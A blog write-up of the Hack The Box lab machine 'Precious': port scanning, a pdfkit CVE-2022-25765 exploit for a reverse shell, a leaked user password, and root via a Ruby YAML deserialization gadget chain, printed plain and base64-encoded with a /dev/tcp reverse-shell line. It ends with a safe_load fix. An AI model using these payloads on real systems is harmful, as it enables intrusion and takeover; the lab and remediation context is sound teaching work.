HTB-Precious

metafa1ica
```bash
ip='10.129.228.98'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip
```


Phusion Passenger(R) 6.0.15

Searched around for a while; this thing has no known vulnerabilities.

Checked the generated file with exiftool: it was produced by pdfkit v0.8.6.


pdfkit 0.8.6

There is CVE-2022-25765 for it.

https://www.exploit-db.com/exploits/51293

```bash
python poc.py -s 10.10.16.42 8989 -w http://precious.htb/ -p url
```

Got a reverse shell, but with hardly any privileges.

Lateral movement

Found the credentials here, which is a bit ridiculous.

```
enry:Q3c1AqGHtoI0aXAYFH
```

5e3b05e507ab5bfb3bb9106425d545d3

Privilege escalation

Next, time to think about privilege escalation.

/opt/update_dependencies.rb

```ruby
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
```

Threw it at Kimi, which immediately suggested an approach.

```bash
echo -e '---\n!ruby/object:IO 2>&1 | /bin/bash -c "bash -i >& /dev/tcp/10.10.16.42/4444 0>&1"' > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

Unfortunately, it did not work.

First, I found that the file lives at /opt/sample/dependencies.yml and contains no actual configuration.

Copy a Ruby deserialization payload from here:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md

The Ruby version is 2.7.4p191.

```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve
```

```bash
echo LS0tCi0gIXJ1Ynkvb2JqZWN0OkdlbTo6SW5zdGFsbGVyCiAgICBpOiB4Ci0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgIGk6IHkKLSAhcnVieS9vYmplY3Q6R2VtOjpSZXF1aXJlbWVudAogIHJlcXVpcmVtZW50czoKICAgICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcgogICAgaW86ICYxICFydWJ5L29iamVjdDpOZXQ6OkJ1ZmZlcmVkSU8KICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgcmVhZDogMAogICAgICAgICBoZWFkZXI6ICJhYmMiCiAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgIHNvY2tldDogJjEgIXJ1Ynkvb2JqZWN0OkdlbTo6UmVxdWVzdFNldAogICAgICAgICAgICAgc2V0czogIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICBtZXRob2RfaWQ6IDpzeXN0ZW0KICAgICAgICAgICAgIGdpdF9zZXQ6IGlkCiAgICAgICAgIG1ldGhvZF9pZDogOnJlc29sdmU= |base64 -d > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

It executed successfully.

```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.42/4444 0>&1'
         method_id: :resolve
```

```bash
echo LS0tCi0gIXJ1Ynkvb2JqZWN0OkdlbTo6SW5zdGFsbGVyCiAgICBpOiB4Ci0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgIGk6IHkKLSAhcnVieS9vYmplY3Q6R2VtOjpSZXF1aXJlbWVudAogIHJlcXVpcmVtZW50czoKICAgICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcgogICAgaW86ICYxICFydWJ5L29iamVjdDpOZXQ6OkJ1ZmZlcmVkSU8KICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgcmVhZDogMAogICAgICAgICBoZWFkZXI6ICJhYmMiCiAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgIHNvY2tldDogJjEgIXJ1Ynkvb2JqZWN0OkdlbTo6UmVxdWVzdFNldAogICAgICAgICAgICAgc2V0czogIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICBtZXRob2RfaWQ6IDpzeXN0ZW0KICAgICAgICAgICAgIGdpdF9zZXQ6IC9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40Mi80NDQ0IDA+JjEnCiAgICAgICAgIG1ldGhvZF9pZDogOnJlc29sdmU= |base64 -d > dependencies.yml
sudo /usr/bin/ruby /opt/update_dependencies.rb
```
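The root cause is the `YAML.load` call in `list_from_file`: on Ruby 2.7 (Psych 3) it instantiates whatever `!ruby/object:` tags the file names, which is exactly what the gadget chain above relies on (from Psych 4, shipped with Ruby 3.1, `YAML.load` is safe by default). Below is an added example, not the box's own script, showing the same dependency check written with `YAML.safe_load` against constructed sample input; the names `safe_list_from_yaml` and `compare_versions` are mine.

```ruby
# Added example: dependency check that refuses object tags in dependencies.yml.
# With YAML.safe_load, only plain scalars, arrays and hashes are built; any
# !ruby/object tag raises Psych::DisallowedClass instead of creating objects.
require "yaml"

# Constructed sample: what a legitimate dependencies.yml should look like.
GOOD_YAML = <<~YAML
  rake: "13.0.1"
  psych: "3.3.2"
YAML

# Constructed sample: the shape of a hostile file (first item of the
# gadget chain from the writeup; the rest is irrelevant, it is rejected here).
HOSTILE_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
      i: x
YAML

# Parse the file safely. Returns a Hash of gem name => version string,
# or nil when the file is malformed, uses tags/aliases, or has the wrong shape.
def safe_list_from_yaml(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  return nil unless data.is_a?(Hash)
  return nil unless data.all? { |k, v| k.is_a?(String) && v.is_a?(String) }
  data
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError
  nil
end

# Compare wanted versions against installed ones (a Hash name => version),
# returning [name, :same | :differs | :missing] per entry instead of printing.
def compare_versions(gems_file, gems_local)
  gems_file.map do |name, wanted|
    installed = gems_local[name]
    next [name, :missing] if installed.nil?
    [name, installed == wanted ? :same : :differs]
  end
end

if __FILE__ == $0
  wanted = safe_list_from_yaml(GOOD_YAML)
  local = { "rake" => "13.0.1", "psych" => "4.0.0" }
  compare_versions(wanted, local).each { |name, state| puts "#{name}: #{state}" }
  puts "hostile file rejected: #{safe_list_from_yaml(HOSTILE_YAML).nil?}"
end
```

Even with the parser fixed, a sudo rule that runs a script reading a file the low-privileged user can write remains a problem; the file should be owned by root and not writable by that user.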

Done.

50d0e33078e248e47949958ee1ae4164

  • Title: HTB-Precious
  • Author: metafa1ica
  • Created: 2025-08-02 18:42:46
  • Updated: 2025-08-17 13:29:28
  • Link: https://metafa1ica.github.io/post/041d853bdc7f/
  • License: This article is licensed under CC BY-NC-SA 4.0.